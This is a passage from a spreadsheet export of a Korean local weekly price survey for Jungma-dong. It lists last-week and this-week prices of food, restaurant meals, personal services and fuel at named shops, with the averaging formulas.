[24,"명태","40cm 1마리",2,2,{"v":4200,"d":"4,200"},{"v":4200,"d":"4,200"},0,"광양마트",{"v":4900,"d":"4,900"},{"v":4900,"d":"4,900"},0,"시장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[25,"고등어","30cm 1마리",{"$f":"COUNTIF(J31,\"<>0\")+COUNTIF(N31,\"<>0\")","v":2},2,{"v":4350,"d":"4,350"},{"v":4350,"d":"4,350"},0,"광양마트",{"v":5200,"d":"5,200"},{"v":5200,"d":"5,200"},0,"시장",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[26,"냉동오징어","30cm 1마리",2,2,{"v":4750,"d":"4,750"},{"v":4750,"d":"4,750"},0,"광양마트",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0,"시장",{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0]
[27,"콩","상품 1kg",2,2,null,null,0,"광양마트",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,"시장",8300,8300,0]
[28,"고춧가루","상품 3kg",2,2,null,null,0,"광양마트",{"v":128400,"d":"128,400"},{"v":110000,"d":"110,000"},{"v":-18400,"d":"-18,400"},"시장",75000,75000,0]
["개인서비스 요금(49개 품목)"]
[1,"설렁탕","1인분 (보통)",{"$f":"COUNTIF(J36,\"<>0\")+COUNTIF(N36,\"<>0\")","v":2},{"$f":"COUNTIF(K36,\"<>0\")+COUNTIF(O36,\"<>0\")","v":2},{"$f":"IF(D36=0,0,SUM(J36,N36)/D36)","v":{"v":8500,"d":"8,500"}},{"$f":"IF(E36=0,0,SUM(K36,O36)/E36)","v":{"v":8500,"d":"8,500"}},{"$f":"G36-F36","v":0},"이정재식육식당(곰탕)",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"종갓집국밥",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[2,"냉면","물냉면, 1인분(보통)",{"$f":"COUNTIF(J37,\"<>0\")+COUNTIF(N37,\"<>0\")","v":2},2,{"$f":"IF(D37=0,0,SUM(J37,N37)/D37)","v":{"v":8500,"d":"8,500"}},{"v":8500,"d":"8,500"},{"$f":"G37-F37","v":0},"진주냉면",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"대갓집",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[3,"비빔밥","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"전주비빔밥",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"사랑분식",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[4,"갈비탕","1인분(보통)",2,2,{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,"진주냉면",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0,"대갓집",{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0]
[5,"삼계탕","1인분(보통)",2,2,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,"수양정",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"황제삼계탕",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0]
[6,"된장찌개\n백반","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"금송숯불구이",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"만수정",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[7,"김치찌개\n백반","1인분(보통)",2,2,{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0,"금송숯불구이",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"만수정",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0]
[8,"불고기","1인분(200g)\n공기밥 제외",2,2,{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"시내식당",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"삼대불고기",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0]
[9,"등심구이","1인분(200g)\n공기밥 제외",2,2,{"v":46000,"d":"46,000"},{"v":46000,"d":"46,000"},0,"ok목장",{"v":36000,"d":"36,000"},{"v":36000,"d":"36,000"},0,"백운뜰",{"v":56000,"d":"56,000"},{"v":56000,"d":"56,000"},0]
[10,"생선초밥","1인분(보통), 활어기준",2,2,{"v":17000,"d":"17,000"},{"v":17000,"d":"17,000"},0,"먹어섬",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"정스시",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0]
[11,"튀김닭","양념통닭 1마리",2,2,{"v":18500,"d":"18,500"},{"v":18500,"d":"18,500"},0,"바로커치킨",{"v":19000,"d":"19,000"},{"v":19000,"d":"19,000"},0,"냠냠닭컴",{"v":18000,"d":"18,000"},{"v":18000,"d":"18,000"},0]
[12,"칼국수","1인분(보통)",2,2,{"v":7250,"d":"7,250"},{"v":7250,"d":"7,250"},0,"토박이",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"사랑분식",{"v":6500,"d":"6,500"},{"v":6500,"d":"6,500"},0]
[13,"조리라면","분식점 1인분",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"사랑분식",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"바오밥",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[14,"김밥","분식점 1인분",2,2,{"v":3250,"d":"3,250"},{"v":3250,"d":"3,250"},0,"사랑분식",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0,"바오밥",{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0]
[15,"짜장면","1인분(보통)",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"행복한젠시오",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"신흥일각",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[16,"짬뽕","1인분(보통)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"행복한젠시오",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"신흥일각",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0]
[17,"탕수육","일반탕수육(보통)",2,2,{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"행복한젠시오",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0,"신흥일각",{"v":27000,"d":"27,000"},{"v":27000,"d":"27,000"},0]
[18,"돈가스","일반돈가스,1인분",2,2,{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},0,"사랑분식",{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"피노아르떼소나무집",{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0]
[19,"햄버거","기본형(야채,고기)",2,2,{"v":3850,"d":"3,850"},{"v":3850,"d":"3,850"},0,"롯데리아",{"v":4700,"d":"4,700"},{"v":4700,"d":"4,700"},0,"맘앤파파",{"v":3000,"d":"3,000"},{"v":3000,"d":"3,000"},0]
[20,"피자","기본형(야채,고기)",2,2,{"v":13900,"d":"13,900"},{"v":13900,"d":"13,900"},0,"피자스쿨",{"v":13900,"d":"13,900"},{"v":13900,"d":"13,900"},0,"피자마루",{"v":13900,"d":"13,900"},{"v":13900,"d":"13,900"},0]
[21,"커피(외식)","일반원두커피",2,2,{"v":3750,"d":"3,750"},{"v":3750,"d":"3,750"},0,"베니샤프",{"v":3700,"d":"3,700"},{"v":3700,"d":"3,700"},0,"코코베르나",{"v":3800,"d":"3,800"},{"v":3800,"d":"3,800"},0]
[22,"국산차(외식)","녹차(티백 또는 잎녹차)",2,2,{"v":4400,"d":"4,400"},{"v":4400,"d":"4,400"},0,"베니샤프",{"v":4300,"d":"4,300"},{"v":4300,"d":"4,300"},0,"코코베르나",{"v":4500,"d":"4,500"},{"v":4500,"d":"4,500"},0]
[23,"삼겹살","식육식당 200g(국내산)",2,2,{"v":15166.5,"d":"15,167"},{"v":15166.5,"d":"15,167"},0,"만수정",{"v":17333,"d":"17,333"},{"v":17333,"d":"17,333"},0,"금송",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0]
[24,"돼지갈비","식육식당 200g(국내산)",2,2,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"대갓집",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"금송",{"v":12000,"d":"12,000"},{"v":12000,"d":"12,000"},0]
[25,"갈비살","식육식당 200g(국내산)",2,2,{"v":44925,"d":"44,925"},{"v":44925,"d":"44,925"},0,"ok목장",{"v":36000,"d":"36,000"},{"v":36000,"d":"36,000"},0,"금목서",{"v":53850,"d":"53,850"},{"v":53850,"d":"53,850"},0]
[26,"생맥주","500CC 1잔",2,2,{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"바로커치킨",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,"냠냠닭컴",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,{"v":46375,"d":"46,375"},{"v":46375,"d":"46,375"},0,"칠성주공a",{"v":48700,"d":"48,700"},{"v":48700,"d":"48,700"},0,"부영아파트",{"v":44050,"d":"44,050"},{"v":44050,"d":"44,050"},0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"매화세탁소",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"강남세탁소",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,"매화세탁소",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"강남세탁소",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",2,2,{"v":2000,"d":"2,000"},{"v":2000,"d":"2,000"},0,"칠성볼링장",{"v":4000,"d":"4,000"},{"v":4000,"d":"4,000"},0,{"$nulls":3},0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",2,2,{"v":75000,"d":"75,000"},{"v":75000,"d":"75,000"},0,"덕산골프장",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},0,{"$nulls":3},0]
[35,"노래방\n이용료","일반인 저녁 1시간",2,2,{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"칠성노래방",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0,"고래고래",{"v":25000,"d":"25,000"},{"v":25000,"d":"25,000"},0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",2,2,{"v":10900,"d":"10,900"},{"v":10900,"d":"10,900"},0,"월드당구장",{"v":11000,"d":"11,000"},{"v":11000,"d":"11,000"},0,"자니스당구장",{"v":10800,"d":"10,800"},{"v":10800,"d":"10,800"},0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",2,2,{"v":17500,"d":"17,500"},{"v":17500,"d":"17,500"},0,"리사진관",{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,"중앙사진관",{"v":20000,"d":"20,000"},{"v":20000,"d":"20,000"},0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",2,2,375,375,0,"리사진관",250,250,0,"중앙사진관",500,500,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",1,1,0,0,0,"대여클럽",0,0,0,{"$nulls":3},0]
[40,"이용료(컷트)","성인조발 중류급 1회",2,2,{"v":13500,"d":"13,500"},{"v":13500,"d":"13,500"},0,"옥룡이용원",{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"숲샘이용원",{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0]
[41,"미용료","성인여자 파마(일반)",2,2,{"v":32500,"d":"32,500"},{"v":32500,"d":"32,500"},0,"모아헤어삽",{"v":30000,"d":"30,000"},{"v":30000,"d":"30,000"},0,"헤어터치",{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",2,2,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,"베스파",{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"대호탕",{"v":7000,"d":"7,000"},{"v":7000,"d":"7,000"},0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",2,2,0,0,0,{"$nulls":7},0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",2,2,{"v":37500,"d":"37,500"},{"v":37500,"d":"37,500"},0,"롯데모텔",{"v":35000,"d":"35,000"},{"v":35000,"d":"35,000"},0,"J1모텔",{"v":40000,"d":"40,000"},{"v":40000,"d":"40,000"},0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[46,"PC방\n이용료","1회 이용시",2,2,{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"아이센스",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0,"인터빌리아",{"v":1300,"d":"1,300"},{"v":1300,"d":"1,300"},0]
[47,"택배이용료","20kg이하, 타지역",2,2,{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"CJ택배",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0,"한진택배",{"v":6000,"d":"6,000"},{"v":6000,"d":"6,000"},0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",2,2,0,0,0,{"$nulls":3},0,{"$nulls":3},0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},{"$f":"COUNTIF(K86,\"<>0\")+COUNTIF(O86,\"<>0\")","v":2},{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":6050,"d":"6,050"}},{"$f":"IF(E86=0,0,SUM(K86,O86)/E86)","v":{"v":6050,"d":"6,050"}},{"$f":"G86-F86","v":0},"참마트",{"v":6200,"d":"6,200"},{"v":6200,"d":"6,200"},0,"백운마트",{"v":5900,"d":"5,900"},{"v":5900,"d":"5,900"},0]
[2,"두부","공장제품 1모",{"$f":"COUNTIF(J87,\"<>0\")+COUNTIF(N87,\"<>0\")","v":2},2,{"$f":"IF(D87=0,0,SUM(J87,N87)/D87)","v":{"v":1475,"d":"1,475"}},{"v":1475,"d":"1,475"},{"$f":"G87-F87","v":0},"참마트",{"v":1450,"d":"1,450"},{"v":1450,"d":"1,450"},0,"백운마트",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,{"v":1100,"d":"1,100"},{"v":1100,"d":"1,100"},0,"참마트",{"v":1100,"d":"1,100"},{"v":1100,"d":"1,100"},0,"백운마트",{"v":1100,"d":"1,100"},{"v":1100,"d":"1,100"},0]
[4,"식용유","콩기름 1.8ml",2,2,{"v":9000,"d":"9,000"},{"v":9000,"d":"9,000"},0,"참마트",{"v":9500,"d":"9,500"},{"v":9500,"d":"9,500"},0,"백운마트",{"v":8500,"d":"8,500"},{"v":8500,"d":"8,500"},0]
[5,"설탕","정백당 1kg",2,2,{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"참마트",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0,"백운마트",{"v":2500,"d":"2,500"},{"v":2500,"d":"2,500"},0]
[6,"생수","플라스틱 1병(500㎖)",2,2,400,400,0,"참마트",350,350,0,"백운마트",450,450,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,{"v":1700,"d":"1,700"},{"v":1700,"d":"1,700"},0,"참마트",{"v":1750,"d":"1,750"},{"v":1750,"d":"1,750"},0,"백운마트",{"v":1650,"d":"1,650"},{"v":1650,"d":"1,650"},0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"v":1525,"d":"1,525"},{"v":1525,"d":"1,525"},0,"참마트",{"v":1550,"d":"1,550"},{"v":1550,"d":"1,550"},0,"백운마트",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0]
[9,"등유","주유소 판매 1ℓ",2,2,{"v":1450,"d":"1,450"},{"v":1450,"d":"1,450"},0,"원예농협백운점",{"v":1400,"d":"1,400"},{"v":1400,"d":"1,400"},0,"사곡주유소",{"v":1500,"d":"1,500"},{"v":1500,"d":"1,500"},0]
[10,"경유","주유소 판매 1ℓ",2,2,{"v":1541.5,"d":"1,542"},{"v":1541.5,"d":"1,542"},0,"원예농협백운점",{"v":1525,"d":"1,525"},{"v":1525,"d":"1,525"},0,"사곡주유소",{"v":1558,"d":"1,558"},{"v":1558,"d":"1,558"},0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",2,2,{"v":1656.5,"d":"1,657"},{"v":1656.5,"d":"1,657"},0,"원예농협백운점",{"v":1655,"d":"1,655"},{"v":1655,"d":"1,655"},0,"사곡주유소",{"v":1658,"d":"1,658"},{"v":1658,"d":"1,658"},0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",2,2,{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},0,"엘리제피아노",{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},0,"목원피아노",{"v":150000,"d":"150,000"},{"v":150000,"d":"150,000"},0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",2,2,{"v":135000,"d":"135,000"},{"v":135000,"d":"135,000"},0,"수채화",{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},0,"색채학",{"v":140000,"d":"140,000"},{"v":140000,"d":"140,000"},0]

{"sheet":"중마동1","index":3,"n_rows":98,"n_cols":16,"rows_kept":98,"merged":[[1,0,1,15],[2,0,2,6],[3,0,4,0],[3,1,4,1],[3,2,4,2],[3,5,3,7],[3,8,3,11],[3,12,3,15],[5,0,5,2],[34,0,34,2],[84,0,84,2]]}
[]
[" 주간 물간동향 (중마동1)"]
[{"$nulls":12},"조사자 : 전미정"]
["연번","품목","규격·단위",null,null,"평     균",null,null,"조 사 1 지 역(농협하나로마트)",{"$nulls":3},"조 사 2 지 역(홈플러스)"]
[{"$nulls":5},"전주","금주","증감액","조 사 처","전주","금주","증감액","조 사 처","전주","금주","증감액"]
["농·축·수산물(28개 품목)"]
[1,"쌀","일반미 20kg(풍광수토)",{"$f":"COUNTIF(J7,\"<>0\")+COUNTIF(N7,\"<>0\")","v":2},{"$f":"COUNTIF(K7,\"<>0\")+COUNTIF(O7,\"<>0\")","v":2},{"$f":"IF(D7=0,0,SUM(J7,N7)/D7)","v":58950},{"$f":"IF(E7=0,0,SUM(K7,O7)/E7)","v":58950},{"$f":"G7-F7","v":0},"농협하나로마트",60000,60000,{"$f":"K7-J7","v":0},"홈플러스",57900,57900,{"$f":"O7-N7","v":0}]
[2,"무","상품 1개(1㎏)",{"$f":"COUNTIF(J8,\"<>0\")+COUNTIF(N8,\"<>0\")","v":2},{"$f":"COUNTIF(K8,\"<>0\")+COUNTIF(O8,\"<>0\")","v":2},{"$f":"IF(D8=0,0,SUM(J8,N8)/D8)","v":1117.5},{"$f":"IF(E8=0,0,SUM(K8,O8)/E8)","v":992.5},{"$f":"G8-F8","v":-125},"농협하나로마트",990,990,{"$f":"K8-J8","v":0},"홈플러스",1245,995,{"$f":"O8-N8","v":-250}]
[3,"상추","잎상추 500g",{"$f":"COUNTIF(J9,\"<>0\")+COUNTIF(N9,\"<>0\")","v":2},{"$f":"COUNTIF(K9,\"<>0\")+COUNTIF(O9,\"<>0\")","v":2},{"$f":"IF(D9=0,0,SUM(J9,N9)/D9)","v":5940},{"$f":"IF(E9=0,0,SUM(K9,O9)/E9)","v":4205},{"$f":"G9-F9","v":-1735},"농협하나로마트",4800,2500,{"$f":"K9-J9","v":-2300},"홈플러스",7080,5910,{"$f":"O9-N9","v":-1170}]
[4,"양상추","상품1개(500g)",{"$f":"COUNTIF(J10,\"<>0\")+COUNTIF(N10,\"<>0\")","v":2},{"$f":"COUNTIF(K10,\"<>0\")+COUNTIF(O10,\"<>0\")","v":2},{"$f":"IF(D10=0,0,SUM(J10,N10)/D10)","v":2045},{"$f":"IF(E10=0,0,SUM(K10,O10)/E10)","v":1995},{"$f":"G10-F10","v":-50},"농협하나로마트",2100,2000,{"$f":"K10-J10","v":-100},"홈플러스",1990,1990,{"$f":"O10-N10","v":0}]
[5,"애호박","상품1개(250~300g)",{"$f":"COUNTIF(J11,\"<>0\")+COUNTIF(N11,\"<>0\")","v":2},{"$f":"COUNTIF(K11,\"<>0\")+COUNTIF(O11,\"<>0\")","v":2},{"$f":"IF(D11=0,0,SUM(J11,N11)/D11)","v":1290},{"$f":"IF(E11=0,0,SUM(K11,O11)/E11)","v":1835},{"$f":"G11-F11","v":545},"농협하나로마트",990,1680,{"$f":"K11-J11","v":690},"홈플러스",1590,1990,{"$f":"O11-N11","v":400}]
[6,"열무","상품 4kg(1단)",{"$f":"COUNTIF(J12,\"<>0\")+COUNTIF(N12,\"<>0\")","v":2},{"$f":"COUNTIF(K12,\"<>0\")+COUNTIF(O12,\"<>0\")","v":2},{"$f":"IF(D12=0,0,SUM(J12,N12)/D12)","v":7950},{"$f":"IF(E12=0,0,SUM(K12,O12)/E12)","v":3485},{"$f":"G12-F12","v":-4465},"농협하나로마트",4000,3980,{"$f":"K12-J12","v":-20},"홈플러스",11900,2990,{"$f":"O12-N12","v":-8910}]
[7,"양파","1망 1kg",{"$f":"COUNTIF(J13,\"<>0\")+COUNTIF(N13,\"<>0\")","v":2},{"$f":"COUNTIF(K13,\"<>0\")+COUNTIF(O13,\"<>0\")","v":2},{"$f":"IF(D13=0,0,SUM(J13,N13)/D13)","v":3000},{"$f":"IF(E13=0,0,SUM(K13,O13)/E13)","v":2735},{"$f":"G13-F13","v":-265},"농협하나로마트",3500,2980,{"$f":"K13-J13","v":-520},"홈플러스",2500,2490,{"$f":"O13-N13","v":-10}]
[8,"오이","상품 3개",{"$f":"COUNTIF(J14,\"<>0\")+COUNTIF(N14,\"<>0\")","v":2},{"$f":"COUNTIF(K14,\"<>0\")+COUNTIF(O14,\"<>0\")","v":2},{"$f":"IF(D14=0,0,SUM(J14,N14)/D14)","v":3835},{"$f":"IF(E14=0,0,SUM(K14,O14)/E14)","v":3485},{"$f":"G14-F14","v":-350},"농협하나로마트",2680,2980,{"$f":"K14-J14","v":300},"홈플러스",4990,3990,{"$f":"O14-N14","v":-1000}]
[9,"풋고추","신선한것 1kg",{"$f":"COUNTIF(J15,\"<>0\")+COUNTIF(N15,\"<>0\")","v":2},{"$f":"COUNTIF(K15,\"<>0\")+COUNTIF(O15,\"<>0\")","v":2},{"$f":"IF(D15=0,0,SUM(J15,N15)/D15)","v":19260},{"$f":"IF(E15=0,0,SUM(K15,O15)/E15)","v":14035},{"$f":"G15-F15","v":-5225},"농협하나로마트",14800,14800,{"$f":"K15-J15","v":0},"홈플러스",23720,13270,{"$f":"O15-N15","v":-10450}]
[10,"마늘","깐것 상품 1kg",{"$f":"COUNTIF(J16,\"<>0\")+COUNTIF(N16,\"<>0\")","v":2},{"$f":"COUNTIF(K16,\"<>0\")+COUNTIF(O16,\"<>0\")","v":2},{"$f":"IF(D16=0,0,SUM(J16,N16)/D16)","v":10900},{"$f":"IF(E16=0,0,SUM(K16,O16)/E16)","v":10245},{"$f":"G16-F16","v":-655},"농협하나로마트",9900,8500,{"$f":"K16-J16","v":-1400},"홈플러스",11900,11990,{"$f":"O16-N16","v":90}]
[11,"감자","흰색 1kg",{"$f":"COUNTIF(J17,\"<>0\")+COUNTIF(N17,\"<>0\")","v":2},{"$f":"COUNTIF(K17,\"<>0\")+COUNTIF(O17,\"<>0\")","v":2},{"$f":"IF(D17=0,0,SUM(J17,N17)/D17)","v":7335},{"$f":"IF(E17=0,0,SUM(K17,O17)/E17)","v":7335},{"$f":"G17-F17","v":0},"농협하나로마트",6900,6900,{"$f":"K17-J17","v":0},"홈플러스",7770,7770,{"$f":"O17-N17","v":0}]
[12,"배추","1포기 3kg",{"$f":"COUNTIF(J18,\"<>0\")+COUNTIF(N18,\"<>0\")","v":2},{"$f":"COUNTIF(K18,\"<>0\")+COUNTIF(O18,\"<>0\")","v":2},{"$f":"IF(D18=0,0,SUM(J18,N18)/D18)","v":3985},{"$f":"IF(E18=0,0,SUM(K18,O18)/E18)","v":4295},{"$f":"G18-F18","v":310},"농협하나로마트",3980,4600,{"$f":"K18-J18","v":620},"홈플러스",3990,3990,{"$f":"O18-N18","v":0}]
[13,"콩나물","1봉지 500g ",{"$f":"COUNTIF(J19,\"<>0\")+COUNTIF(N19,\"<>0\")","v":2},{"$f":"COUNTIF(K19,\"<>0\")+COUNTIF(O19,\"<>0\")","v":2},{"$f":"IF(D19=0,0,SUM(J19,N19)/D19)","v":2375},{"$f":"IF(E19=0,0,SUM(K19,O19)/E19)","v":2375},{"$f":"G19-F19","v":0},"농협하나로마트",2360,2360,{"$f":"K19-J19","v":0},"홈플러스",2390,2390,{"$f":"O19-N19","v":0}]
[14,"사과","상품 1개(300∼350g)",{"$f":"COUNTIF(J20,\"<>0\")+COUNTIF(N20,\"<>0\")","v":2},{"$f":"COUNTIF(K20,\"<>0\")+COUNTIF(O20,\"<>0\")","v":2},{"$f":"IF(D20=0,0,SUM(J20,N20)/D20)","v":2095},{"$f":"IF(E20=0,0,SUM(K20,O20)/E20)","v":1700},{"$f":"G20-F20","v":-395},"농협하나로마트",2300,1000,{"$f":"K20-J20","v":-1300},"홈플러스",1890,2400,{"$f":"O20-N20","v":510}]
[15,"배","상품 1개(650∼700g)",{"$f":"COUNTIF(J21,\"<>0\")+COUNTIF(N21,\"<>0\")","v":2},{"$f":"COUNTIF(K21,\"<>0\")+COUNTIF(O21,\"<>0\")","v":2},{"$f":"IF(D21=0,0,SUM(J21,N21)/D21)","v":2990},{"$f":"IF(E21=0,0,SUM(K21,O21)/E21)","v":1845},{"$f":"G21-F21","v":-1145},"농협하나로마트",3490,1200,{"$f":"K21-J21","v":-2290},"홈플러스",2490,2490,{"$f":"O21-N21","v":0}]
[16,"바나나","상품 1kg",{"$f":"COUNTIF(J22,\"<>0\")+COUNTIF(N22,\"<>0\")","v":2},{"$f":"COUNTIF(K22,\"<>0\")+COUNTIF(O22,\"<>0\")","v":2},{"$f":"IF(D22=0,0,SUM(J22,N22)/D22)","v":4720},{"$f":"IF(E22=0,0,SUM(K22,O22)/E22)","v":4970},{"$f":"G22-F22","v":250},"농협하나로마트",3950,3950,{"$f":"K22-J22","v":0},"홈플러스",5490,5990,{"$f":"O22-N22","v":500}]
[17,"쇠고기\n(한우)","등심 600g(상등육)",{"$f":"COUNTIF(J23,\"<>0\")+COUNTIF(N23,\"<>0\")","v":2},{"$f":"COUNTIF(K23,\"<>0\")+COUNTIF(O23,\"<>0\")","v":2},{"$f":"IF(D23=0,0,SUM(J23,N23)/D23)","v":89370},{"$f":"IF(E23=0,0,SUM(K23,O23)/E23)","v":71370},{"$f":"G23-F23","v":-18000},"농협하나로마트",70800,52800,{"$f":"K23-J23","v":-18000},"홈플러스",107940,89940,{"$f":"O23-N23","v":-18000}]
[18,"쇠고기\n(수입육)","등심 600g(상등육)",{"$f":"COUNTIF(J24,\"<>0\")+COUNTIF(N24,\"<>0\")","v":1},{"$f":"COUNTIF(K24,\"<>0\")+COUNTIF(O24,\"<>0\")","v":1},{"$f":"IF(D24=0,0,SUM(J24,N24)/D24)","v":18900},{"$f":"IF(E24=0,0,SUM(K24,O24)/E24)","v":18900},{"$f":"G24-F24","v":0},"농협하나로마트",0,0,{"$f":"K24-J24","v":0},"홈플러스",18900,18900,{"$f":"O24-N24","v":0}]
[19,"돼지고기","삼겹살 600g(상등육)",{"$f":"COUNTIF(J25,\"<>0\")+COUNTIF(N25,\"<>0\")","v":2},{"$f":"COUNTIF(K25,\"<>0\")+COUNTIF(O25,\"<>0\")","v":2},{"$f":"IF(D25=0,0,SUM(J25,N25)/D25)","v":17010},{"$f":"IF(E25=0,0,SUM(K25,O25)/E25)","v":22110},{"$f":"G25-F25","v":5100},"농협하나로마트",16080,16080,{"$f":"K25-J25","v":0},"홈플러스",17940,28140,{"$f":"O25-N25","v":10200}]
[20,"닭고기","육계 1마리(1kg 정도)",{"$f":"COUNTIF(J26,\"<>0\")+COUNTIF(N26,\"<>0\")","v":2},{"$f":"COUNTIF(K26,\"<>0\")+COUNTIF(O26,\"<>0\")","v":2},{"$f":"IF(D26=0,0,SUM(J26,N26)/D26)","v":8695},{"$f":"IF(E26=0,0,SUM(K26,O26)/E26)","v":8695},{"$f":"G26-F26","v":0},"농협하나로마트",8900,8900,{"$f":"K26-J26","v":0},"홈플러스",8490,8490,{"$f":"O26-N26","v":0}]
